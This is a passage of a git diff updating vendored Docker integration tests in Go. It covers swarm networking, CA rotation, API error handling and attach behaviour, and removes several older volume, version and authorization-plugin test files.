types.ServiceUpdateOptions{}) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances) } -func (s *DockerSwarmSuite) TestAPISwarmSecretsEmptyList(c *check.C) { +// Unlocking an unlocked swarm results in an error +func (s *DockerSwarmSuite) TestAPISwarmUnlockNotLocked(c *check.C) { d := s.AddDaemon(c, true, true) + err := d.SwarmUnlock(swarm.UnlockRequest{UnlockKey: "wrong-key"}) + c.Assert(err, checker.NotNil) + c.Assert(err.Error(), checker.Contains, "swarm is 
not locked") +} - secrets := d.listSecrets(c) - c.Assert(secrets, checker.NotNil) - c.Assert(len(secrets), checker.Equals, 0, check.Commentf("secrets: %#v", secrets)) +// #29885 +func (s *DockerSwarmSuite) TestAPISwarmErrorHandling(c *check.C) { + ln, err := net.Listen("tcp", fmt.Sprintf(":%d", defaultSwarmPort)) + c.Assert(err, checker.IsNil) + defer ln.Close() + d := s.AddDaemon(c, false, false) + client := d.NewClientT(c) + _, err = client.SwarmInit(context.Background(), swarm.InitRequest{ + ListenAddr: d.SwarmListenAddr(), + }) + c.Assert(err, checker.NotNil) + c.Assert(err.Error(), checker.Contains, "address already in use") } -func (s *DockerSwarmSuite) TestAPISwarmSecretsCreate(c *check.C) { +// Test case for 30242, where duplicate networks, with different drivers `bridge` and `overlay`, +// caused both scopes to be `swarm` for `docker network inspect` and `docker network ls`. +// This test makes sure the fixes correctly output scopes instead. +func (s *DockerSwarmSuite) TestAPIDuplicateNetworks(c *check.C) { d := s.AddDaemon(c, true, true) + cli, err := d.NewClient() + c.Assert(err, checker.IsNil) + defer cli.Close() - testName := "test_secret" - id := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ - Name: testName, - }, - []byte("TESTINGDATA"), - }) - c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + name := "foo" + networkCreate := types.NetworkCreate{ + CheckDuplicate: false, + } - secrets := d.listSecrets(c) - c.Assert(len(secrets), checker.Equals, 1, check.Commentf("secrets: %#v", secrets)) - name := secrets[0].Spec.Annotations.Name - c.Assert(name, checker.Equals, testName, check.Commentf("secret: %s", name)) -} + networkCreate.Driver = "bridge" -func (s *DockerSwarmSuite) TestAPISwarmSecretsDelete(c *check.C) { - d := s.AddDaemon(c, true, true) + n1, err := cli.NetworkCreate(context.Background(), name, networkCreate) + c.Assert(err, checker.IsNil) - testName := "test_secret" - id := d.createSecret(c, 
swarm.SecretSpec{ - swarm.Annotations{ - Name: testName, - }, - []byte("TESTINGDATA"), - }) - c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + networkCreate.Driver = "overlay" - secret := d.getSecret(c, id) - c.Assert(secret.ID, checker.Equals, id, check.Commentf("secret: %v", secret)) + n2, err := cli.NetworkCreate(context.Background(), name, networkCreate) + c.Assert(err, checker.IsNil) - d.deleteSecret(c, secret.ID) - status, out, err := d.SockRequest("GET", "/secrets/"+id, nil) + r1, err := cli.NetworkInspect(context.Background(), n1.ID, types.NetworkInspectOptions{}) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNotFound, check.Commentf("secret delete: %s", string(out))) + c.Assert(r1.Scope, checker.Equals, "local") + + r2, err := cli.NetworkInspect(context.Background(), n2.ID, types.NetworkInspectOptions{}) + c.Assert(err, checker.IsNil) + c.Assert(r2.Scope, checker.Equals, "swarm") } -// Test case for 30242, where duplicate networks, with different drivers `bridge` and `overlay`, -// caused both scopes to be `swarm` for `docker network inspect` and `docker network ls`. -// This test makes sure the fixes correctly output scopes instead. -func (s *DockerSwarmSuite) TestAPIDuplicateNetworks(c *check.C) { +// Test case for 30178 +func (s *DockerSwarmSuite) TestAPISwarmHealthcheckNone(c *check.C) { + // Issue #36386 can be a independent one, which is worth further investigation. 
+ c.Skip("Root cause of Issue #36386 is needed") d := s.AddDaemon(c, true, true) - name := "foo" - networkCreateRequest := types.NetworkCreateRequest{ - Name: name, - NetworkCreate: types.NetworkCreate{ - CheckDuplicate: false, - }, - } + out, err := d.Cmd("network", "create", "-d", "overlay", "lb") + c.Assert(err, checker.IsNil, check.Commentf(out)) - var n1 types.NetworkCreateResponse - networkCreateRequest.NetworkCreate.Driver = "bridge" + instances := 1 + d.CreateService(c, simpleTestService, setInstances(instances), func(s *swarm.Service) { + if s.Spec.TaskTemplate.ContainerSpec == nil { + s.Spec.TaskTemplate.ContainerSpec = &swarm.ContainerSpec{} + } + s.Spec.TaskTemplate.ContainerSpec.Healthcheck = &container.HealthConfig{} + s.Spec.TaskTemplate.Networks = []swarm.NetworkAttachmentConfig{ + {Target: "lb"}, + } + }) - status, out, err := d.SockRequest("POST", "/networks/create", networkCreateRequest) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(out))) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances) - c.Assert(json.Unmarshal(out, &n1), checker.IsNil) + containers := d.ActiveContainers(c) - var n2 types.NetworkCreateResponse - networkCreateRequest.NetworkCreate.Driver = "overlay" + out, err = d.Cmd("exec", containers[0], "ping", "-c1", "-W3", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) +} - status, out, err = d.SockRequest("POST", "/networks/create", networkCreateRequest) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(out))) +func (s *DockerSwarmSuite) TestSwarmRepeatedRootRotation(c *check.C) { + m := s.AddDaemon(c, true, true) + w := s.AddDaemon(c, true, false) + + info := m.SwarmInfo(c) + + currentTrustRoot := info.Cluster.TLSInfo.TrustRoot + + // rotate multiple times + for i := 0; i < 4; i++ { + var err 
error + var cert, key []byte + if i%2 != 0 { + cert, _, key, err = initca.New(&csr.CertificateRequest{ + CN: "newRoot", + KeyRequest: csr.NewBasicKeyRequest(), + CA: &csr.CAConfig{Expiry: ca.RootCAExpiration}, + }) + c.Assert(err, checker.IsNil) + } + expectedCert := string(cert) + m.UpdateSwarm(c, func(s *swarm.Spec) { + s.CAConfig.SigningCACert = expectedCert + s.CAConfig.SigningCAKey = string(key) + s.CAConfig.ForceRotate++ + }) - c.Assert(json.Unmarshal(out, &n2), checker.IsNil) + // poll to make sure update succeeds + var clusterTLSInfo swarm.TLSInfo + for j := 0; j < 18; j++ { + info := m.SwarmInfo(c) - var r1 types.NetworkResource + // the desired CA cert and key is always redacted + c.Assert(info.Cluster.Spec.CAConfig.SigningCAKey, checker.Equals, "") + c.Assert(info.Cluster.Spec.CAConfig.SigningCACert, checker.Equals, "") - status, out, err = d.SockRequest("GET", "/networks/"+n1.ID, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(out))) + clusterTLSInfo = info.Cluster.TLSInfo - c.Assert(json.Unmarshal(out, &r1), checker.IsNil) + // if root rotation is done and the trust root has changed, we don't have to poll anymore + if !info.Cluster.RootRotationInProgress && clusterTLSInfo.TrustRoot != currentTrustRoot { + break + } - c.Assert(r1.Scope, checker.Equals, "local") + // root rotation not done + time.Sleep(250 * time.Millisecond) + } + if cert != nil { + c.Assert(clusterTLSInfo.TrustRoot, checker.Equals, expectedCert) + } + // could take another second or two for the nodes to trust the new roots after they've all gotten + // new TLS certificates + for j := 0; j < 18; j++ { + mInfo := m.GetNode(c, m.NodeID()).Description.TLSInfo + wInfo := m.GetNode(c, w.NodeID()).Description.TLSInfo + + if mInfo.TrustRoot == clusterTLSInfo.TrustRoot && wInfo.TrustRoot == clusterTLSInfo.TrustRoot { + break + } - var r2 types.NetworkResource + // nodes don't trust root certs yet + 
time.Sleep(250 * time.Millisecond) + } + + c.Assert(m.GetNode(c, m.NodeID()).Description.TLSInfo, checker.DeepEquals, clusterTLSInfo) + c.Assert(m.GetNode(c, w.NodeID()).Description.TLSInfo, checker.DeepEquals, clusterTLSInfo) + currentTrustRoot = clusterTLSInfo.TrustRoot + } +} - status, out, err = d.SockRequest("GET", "/networks/"+n2.ID, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(out))) +func (s *DockerSwarmSuite) TestAPINetworkInspectWithScope(c *check.C) { + d := s.AddDaemon(c, true, true) - c.Assert(json.Unmarshal(out, &r2), checker.IsNil) + name := "test-scoped-network" + ctx := context.Background() + apiclient, err := d.NewClient() + assert.NilError(c, err) - c.Assert(r2.Scope, checker.Equals, "swarm") + resp, err := apiclient.NetworkCreate(ctx, name, types.NetworkCreate{Driver: "overlay"}) + assert.NilError(c, err) + + network, err := apiclient.NetworkInspect(ctx, name, types.NetworkInspectOptions{}) + assert.NilError(c, err) + assert.Check(c, is.Equal("swarm", network.Scope)) + assert.Check(c, is.Equal(resp.ID, network.ID)) + + _, err = apiclient.NetworkInspect(ctx, name, types.NetworkInspectOptions{Scope: "local"}) + assert.Check(c, client.IsErrNotFound(err)) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_test.go index 3b38ba96f2..5b7e3e97f9 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_test.go @@ -2,26 +2,27 @@ package main import ( "fmt" + "io/ioutil" "net/http" - "net/http/httptest" "runtime" "strconv" "strings" "github.com/docker/docker/api" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration-cli/checker" + 
"github.com/docker/docker/internal/test/request" "github.com/go-check/check" ) func (s *DockerSuite) TestAPIOptionsRoute(c *check.C) { - status, _, err := sockRequest("OPTIONS", "/", nil) + resp, _, err := request.Do("/", request.Method(http.MethodOptions)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) } func (s *DockerSuite) TestAPIGetEnabledCORS(c *check.C) { - res, body, err := sockRequestRaw("GET", "/version", nil, "") + res, body, err := request.Get("/version") c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusOK) body.Close() @@ -33,7 +34,7 @@ func (s *DockerSuite) TestAPIGetEnabledCORS(c *check.C) { } func (s *DockerSuite) TestAPIClientVersionOldNotSupported(c *check.C) { - if daemonPlatform != runtime.GOOS { + if testEnv.OSType != runtime.GOOS { c.Skip("Daemon platform doesn't match test platform") } if api.MinVersion == api.DefaultVersion { @@ -46,39 +47,26 @@ func (s *DockerSuite) TestAPIClientVersionOldNotSupported(c *check.C) { v[1] = strconv.Itoa(vMinInt) version := strings.Join(v, ".") - status, body, err := sockRequest("GET", "/v"+version+"/version", nil) + resp, body, err := request.Get("/v" + version + "/version") c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusBadRequest) + defer body.Close() + c.Assert(resp.StatusCode, checker.Equals, http.StatusBadRequest) expected := fmt.Sprintf("client version %s is too old. 
Minimum supported API version is %s, please upgrade your client to a newer version", version, api.MinVersion) - c.Assert(strings.TrimSpace(string(body)), checker.Contains, expected) -} - -func (s *DockerSuite) TestAPIDockerAPIVersion(c *check.C) { - var svrVersion string - - server := httptest.NewServer(http.HandlerFunc( - func(w http.ResponseWriter, r *http.Request) { - w.Header().Set("API-Version", api.DefaultVersion) - url := r.URL.Path - svrVersion = url - })) - defer server.Close() - - // Test using the env var first - result := icmd.RunCmd(icmd.Cmd{ - Command: binaryWithArgs("-H="+server.URL[7:], "version"), - Env: appendBaseEnv(false, "DOCKER_API_VERSION=xxx"), - }) - c.Assert(result, icmd.Matches, icmd.Expected{Out: "API version: xxx", ExitCode: 1}) - c.Assert(svrVersion, check.Equals, "/vxxx/version", check.Commentf("%s", result.Compare(icmd.Success))) + content, err := ioutil.ReadAll(body) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(string(content)), checker.Contains, expected) } func (s *DockerSuite) TestAPIErrorJSON(c *check.C) { - httpResp, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(`{}`), "application/json") + httpResp, body, err := request.Post("/containers/create", request.JSONBody(struct{}{})) c.Assert(err, checker.IsNil) - c.Assert(httpResp.StatusCode, checker.Equals, http.StatusInternalServerError) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(httpResp.StatusCode, checker.Equals, http.StatusInternalServerError) + } else { + c.Assert(httpResp.StatusCode, checker.Equals, http.StatusBadRequest) + } c.Assert(httpResp.Header.Get("Content-Type"), checker.Equals, "application/json") - b, err := readBody(body) + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) c.Assert(getErrorMessage(c, b), checker.Equals, "Config cannot be empty in order to create a container") } @@ -87,32 +75,36 @@ func (s *DockerSuite) TestAPIErrorPlainText(c *check.C) { // Windows requires API 
1.25 or later. This test is validating a behaviour which was present // in v1.23, but changed in 1.24, hence not applicable on Windows. See apiVersionSupportsJSONErrors testRequires(c, DaemonIsLinux) - httpResp, body, err := sockRequestRaw("POST", "/v1.23/containers/create", strings.NewReader(`{}`), "application/json") + httpResp, body, err := request.Post("/v1.23/containers/create", request.JSONBody(struct{}{})) c.Assert(err, checker.IsNil) - c.Assert(httpResp.StatusCode, checker.Equals, http.StatusInternalServerError) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(httpResp.StatusCode, checker.Equals, http.StatusInternalServerError) + } else { + c.Assert(httpResp.StatusCode, checker.Equals, http.StatusBadRequest) + } c.Assert(httpResp.Header.Get("Content-Type"), checker.Contains, "text/plain") - b, err := readBody(body) + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(string(b)), checker.Equals, "Config cannot be empty in order to create a container") } func (s *DockerSuite) TestAPIErrorNotFoundJSON(c *check.C) { // 404 is a different code path to normal errors, so test separately - httpResp, body, err := sockRequestRaw("GET", "/notfound", nil, "application/json") + httpResp, body, err := request.Get("/notfound", request.JSON) c.Assert(err, checker.IsNil) c.Assert(httpResp.StatusCode, checker.Equals, http.StatusNotFound) c.Assert(httpResp.Header.Get("Content-Type"), checker.Equals, "application/json") - b, err := readBody(body) + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) c.Assert(getErrorMessage(c, b), checker.Equals, "page not found") } func (s *DockerSuite) TestAPIErrorNotFoundPlainText(c *check.C) { - httpResp, body, err := sockRequestRaw("GET", "/v1.23/notfound", nil, "application/json") + httpResp, body, err := request.Get("/v1.23/notfound", request.JSON) c.Assert(err, checker.IsNil) c.Assert(httpResp.StatusCode, checker.Equals, http.StatusNotFound) 
c.Assert(httpResp.Header.Get("Content-Type"), checker.Contains, "text/plain") - b, err := readBody(body) + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(string(b)), checker.Equals, "page not found") } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go deleted file mode 100644 index dfe14ec7b0..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go +++ /dev/null @@ -1,35 +0,0 @@ -// +build !windows - -package main - -import ( - "strings" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestAPIUpdateContainer(c *check.C) { - testRequires(c, DaemonIsLinux) - testRequires(c, memoryLimitSupport) - testRequires(c, swapMemorySupport) - - name := "apiUpdateContainer" - hostConfig := map[string]interface{}{ - "Memory": 314572800, - "MemorySwap": 524288000, - } - dockerCmd(c, "run", "-d", "--name", name, "-m", "200M", "busybox", "top") - _, _, err := sockRequest("POST", "/containers/"+name+"/update", hostConfig) - c.Assert(err, check.IsNil) - - c.Assert(inspectField(c, name, "HostConfig.Memory"), checker.Equals, "314572800") - file := "/sys/fs/cgroup/memory/memory.limit_in_bytes" - out, _ := dockerCmd(c, "exec", name, "cat", file) - c.Assert(strings.TrimSpace(out), checker.Equals, "314572800") - - c.Assert(inspectField(c, name, "HostConfig.MemorySwap"), checker.Equals, "524288000") - file = "/sys/fs/cgroup/memory/memory.memsw.limit_in_bytes" - out, _ = dockerCmd(c, "exec", name, "cat", file) - c.Assert(strings.TrimSpace(out), checker.Equals, "524288000") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go deleted file mode 100644 index eb2de5904a..0000000000 --- 
a/vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go +++ /dev/null @@ -1,23 +0,0 @@ -package main - -import ( - "encoding/json" - "net/http" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/dockerversion" - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestGetVersion(c *check.C) { - status, body, err := sockRequest("GET", "/version", nil) - c.Assert(status, checker.Equals, http.StatusOK) - c.Assert(err, checker.IsNil) - - var v types.Version - - c.Assert(json.Unmarshal(body, &v), checker.IsNil) - - c.Assert(v.Version, checker.Equals, dockerversion.Version, check.Commentf("Version mismatch")) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go deleted file mode 100644 index d1d44005e0..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go +++ /dev/null @@ -1,89 +0,0 @@ -package main - -import ( - "encoding/json" - "net/http" - "path/filepath" - - "github.com/docker/docker/api/types" - volumetypes "github.com/docker/docker/api/types/volume" - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestVolumesAPIList(c *check.C) { - prefix, _ := getPrefixAndSlashFromDaemonPlatform() - dockerCmd(c, "run", "-v", prefix+"/foo", "busybox") - - status, b, err := sockRequest("GET", "/volumes", nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - - var volumes volumetypes.VolumesListOKBody - c.Assert(json.Unmarshal(b, &volumes), checker.IsNil) - - c.Assert(len(volumes.Volumes), checker.Equals, 1, check.Commentf("\n%v", volumes.Volumes)) -} - -func (s *DockerSuite) TestVolumesAPICreate(c *check.C) { - config := volumetypes.VolumesCreateBody{ - Name: "test", - } - status, b, err := sockRequest("POST", "/volumes/create", config) - 
c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusCreated, check.Commentf(string(b))) - - var vol types.Volume - err = json.Unmarshal(b, &vol) - c.Assert(err, checker.IsNil) - - c.Assert(filepath.Base(filepath.Dir(vol.Mountpoint)), checker.Equals, config.Name) -} - -func (s *DockerSuite) TestVolumesAPIRemove(c *check.C) { - prefix, _ := getPrefixAndSlashFromDaemonPlatform() - dockerCmd(c, "run", "-v", prefix+"/foo", "--name=test", "busybox") - - status, b, err := sockRequest("GET", "/volumes", nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - - var volumes volumetypes.VolumesListOKBody - c.Assert(json.Unmarshal(b, &volumes), checker.IsNil) - c.Assert(len(volumes.Volumes), checker.Equals, 1, check.Commentf("\n%v", volumes.Volumes)) - - v := volumes.Volumes[0] - status, _, err = sockRequest("DELETE", "/volumes/"+v.Name, nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusConflict, check.Commentf("Should not be able to remove a volume that is in use")) - - dockerCmd(c, "rm", "-f", "test") - status, data, err := sockRequest("DELETE", "/volumes/"+v.Name, nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent, check.Commentf(string(data))) - -} - -func (s *DockerSuite) TestVolumesAPIInspect(c *check.C) { - config := volumetypes.VolumesCreateBody{ - Name: "test", - } - status, b, err := sockRequest("POST", "/volumes/create", config) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusCreated, check.Commentf(string(b))) - - status, b, err = sockRequest("GET", "/volumes", nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(b))) - - var volumes volumetypes.VolumesListOKBody - c.Assert(json.Unmarshal(b, &volumes), checker.IsNil) - c.Assert(len(volumes.Volumes), checker.Equals, 1, check.Commentf("\n%v", volumes.Volumes)) - - var vol types.Volume - status, b, err = 
sockRequest("GET", "/volumes/"+config.Name, nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(b))) - c.Assert(json.Unmarshal(b, &vol), checker.IsNil) - c.Assert(vol.Name, checker.Equals, config.Name) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go index 2df4fdc4d2..ef2c708bbe 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go @@ -10,8 +10,9 @@ import ( "sync" "time" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/integration-cli/cli" "github.com/go-check/check" + "gotest.tools/icmd" ) const attachWait = 5 * time.Second @@ -22,8 +23,8 @@ func (s *DockerSuite) TestAttachMultipleAndRestart(c *check.C) { endGroup.Add(3) startGroup.Add(3) - err := waitForContainer("attacher", "-d", "busybox", "/bin/sh", "-c", "while true; do sleep 1; echo hello; done") - c.Assert(err, check.IsNil) + cli.DockerCmd(c, "run", "--name", "attacher", "-d", "busybox", "/bin/sh", "-c", "while true; do sleep 1; echo hello; done") + cli.WaitRun(c, "attacher") startDone := make(chan struct{}) endDone := make(chan struct{}) @@ -77,7 +78,7 @@ func (s *DockerSuite) TestAttachMultipleAndRestart(c *check.C) { c.Fatalf("Attaches did not initialize properly") } - dockerCmd(c, "kill", "attacher") + cli.DockerCmd(c, "kill", "attacher") select { case <-endDone: @@ -87,6 +88,14 @@ func (s *DockerSuite) TestAttachMultipleAndRestart(c *check.C) { } func (s *DockerSuite) TestAttachTTYWithoutStdin(c *check.C) { + // TODO @jhowardmsft. Figure out how to get this running again reliable on Windows. + // It works by accident at the moment. Sometimes. I've gone back to v1.13.0 and see the same. + // On Windows, docker run -d -ti busybox causes the container to exit immediately. 
+ // Obviously a year back when I updated the test, that was not the case. However, + // with this, and the test racing with the tear-down which panic's, sometimes CI + // will just fail and `MISS` all the other tests. For now, disabling it. Will + // open an issue to track re-enabling this and root-causing the problem. + testRequires(c, DaemonIsLinux) out, _ := dockerCmd(c, "run", "-d", "-ti", "busybox") id := strings.TrimSpace(out) @@ -138,7 +147,10 @@ func (s *DockerSuite) TestAttachDisconnect(c *check.C) { c.Assert(err, check.IsNil) defer stdout.Close() c.Assert(cmd.Start(), check.IsNil) - defer cmd.Process.Kill() + defer func() { + cmd.Process.Kill() + cmd.Wait() + }() _, err = stdin.Write([]byte("hello\n")) c.Assert(err, check.IsNil) @@ -155,12 +167,11 @@ func (s *DockerSuite) TestAttachDisconnect(c *check.C) { func (s *DockerSuite) TestAttachPausedContainer(c *check.C) { testRequires(c, IsPausable) - defer unpauseAllContainers() runSleepingContainer(c, "-d", "--name=test") dockerCmd(c, "pause", "test") result := dockerCmdWithResult("attach", "test") - c.Assert(result, icmd.Matches, icmd.Expected{ + result.Assert(c, icmd.Expected{ Error: "exit status 1", ExitCode: 1, Err: "You cannot attach to a paused container, unpause it first", diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go index fb794ccc40..9affb944b1 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go @@ -9,7 +9,7 @@ import ( "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/docker/docker/pkg/stringid" "github.com/go-check/check" "github.com/kr/pty" @@ -69,10 +69,10 @@ func (s *DockerSuite) TestAttachAfterDetach(c *check.C) { cmd.Stdout = tty cmd.Stderr = tty - errChan := 
make(chan error) + cmdExit := make(chan error) go func() { - errChan <- cmd.Run() - close(errChan) + cmdExit <- cmd.Run() + close(cmdExit) }() c.Assert(waitRun(name), check.IsNil) @@ -82,12 +82,7 @@ func (s *DockerSuite) TestAttachAfterDetach(c *check.C) { cpty.Write([]byte{17}) select { - case err := <-errChan: - if err != nil { - buff := make([]byte, 200) - tty.Read(buff) - c.Fatalf("%s: %s", err, buff) - } + case <-cmdExit: case <-time.After(5 * time.Second): c.Fatal("timeout while detaching") } @@ -102,6 +97,7 @@ func (s *DockerSuite) TestAttachAfterDetach(c *check.C) { err = cmd.Start() c.Assert(err, checker.IsNil) + defer cmd.Process.Kill() bytes := make([]byte, 10) var nBytes int @@ -124,11 +120,7 @@ func (s *DockerSuite) TestAttachAfterDetach(c *check.C) { c.Fatal("timeout waiting for attach read") } - err = cmd.Wait() - c.Assert(err, checker.IsNil) - c.Assert(string(bytes[:nBytes]), checker.Contains, "/ #") - } // TestAttachDetach checks that attach in tty mode can be detached using the long container ID @@ -173,7 +165,7 @@ func (s *DockerSuite) TestAttachDetach(c *check.C) { c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running")) go func() { - dockerCmd(c, "kill", id) + dockerCmdWithResult("kill", id) }() select { @@ -225,7 +217,7 @@ func (s *DockerSuite) TestAttachDetachTruncatedID(c *check.C) { c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running")) go func() { - dockerCmd(c, "kill", id) + dockerCmdWithResult("kill", id) }() select { diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go deleted file mode 100644 index 8a669fb379..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go +++ /dev/null @@ -1,133 +0,0 @@ -// +build !windows - -package main - -import ( - "fmt" - "strings" - - 
"github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -var ( - authzPluginName = "riyaz/authz-no-volume-plugin" - authzPluginTag = "latest" - authzPluginNameWithTag = authzPluginName + ":" + authzPluginTag - authzPluginBadManifestName = "riyaz/authz-plugin-bad-manifest" - nonexistentAuthzPluginName = "riyaz/nonexistent-authz-plugin" -) - -func init() { - check.Suite(&DockerAuthzV2Suite{ - ds: &DockerSuite{}, - }) -} - -type DockerAuthzV2Suite struct { - ds *DockerSuite - d *Daemon -} - -func (s *DockerAuthzV2Suite) SetUpTest(c *check.C) { - testRequires(c, DaemonIsLinux, Network) - s.d = NewDaemon(c) - c.Assert(s.d.Start(), check.IsNil) -} - -func (s *DockerAuthzV2Suite) TearDownTest(c *check.C) { - s.d.Stop() - s.ds.TearDownTest(c) -} - -func (s *DockerAuthzV2Suite) TestAuthZPluginAllowNonVolumeRequest(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) - // Install authz plugin - _, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", authzPluginNameWithTag) - c.Assert(err, checker.IsNil) - // start the daemon with the plugin and load busybox, --net=none build fails otherwise - // because it needs to pull busybox - c.Assert(s.d.Restart("--authorization-plugin="+authzPluginNameWithTag), check.IsNil) - c.Assert(s.d.LoadBusybox(), check.IsNil) - - // defer disabling the plugin - defer func() { - c.Assert(s.d.Restart(), check.IsNil) - _, err = s.d.Cmd("plugin", "disable", authzPluginNameWithTag) - c.Assert(err, checker.IsNil) - _, err = s.d.Cmd("plugin", "rm", authzPluginNameWithTag) - c.Assert(err, checker.IsNil) - }() - - // Ensure docker run command and accompanying docker ps are successful - out, err := s.d.Cmd("run", "-d", "busybox", "top") - c.Assert(err, check.IsNil) - - id := strings.TrimSpace(out) - - out, err = s.d.Cmd("ps") - c.Assert(err, check.IsNil) - c.Assert(assertContainerList(out, []string{id}), check.Equals, true) -} - -func (s *DockerAuthzV2Suite) TestAuthZPluginRejectVolumeRequests(c 
*check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) - // Install authz plugin - _, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", authzPluginNameWithTag) - c.Assert(err, checker.IsNil) - - // restart the daemon with the plugin - c.Assert(s.d.Restart("--authorization-plugin="+authzPluginNameWithTag), check.IsNil) - - // defer disabling the plugin - defer func() { - c.Assert(s.d.Restart(), check.IsNil) - _, err = s.d.Cmd("plugin", "disable", authzPluginNameWithTag) - c.Assert(err, checker.IsNil) - _, err = s.d.Cmd("plugin", "rm", authzPluginNameWithTag) - c.Assert(err, checker.IsNil) - }() - - out, err := s.d.Cmd("volume", "create") - c.Assert(err, check.NotNil) - c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)) - - out, err = s.d.Cmd("volume", "ls") - c.Assert(err, check.NotNil) - c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)) - - // The plugin will block the command before it can determine the volume does not exist - out, err = s.d.Cmd("volume", "rm", "test") - c.Assert(err, check.NotNil) - c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)) - - out, err = s.d.Cmd("volume", "inspect", "test") - c.Assert(err, check.NotNil) - c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)) - - out, err = s.d.Cmd("volume", "prune", "-f") - c.Assert(err, 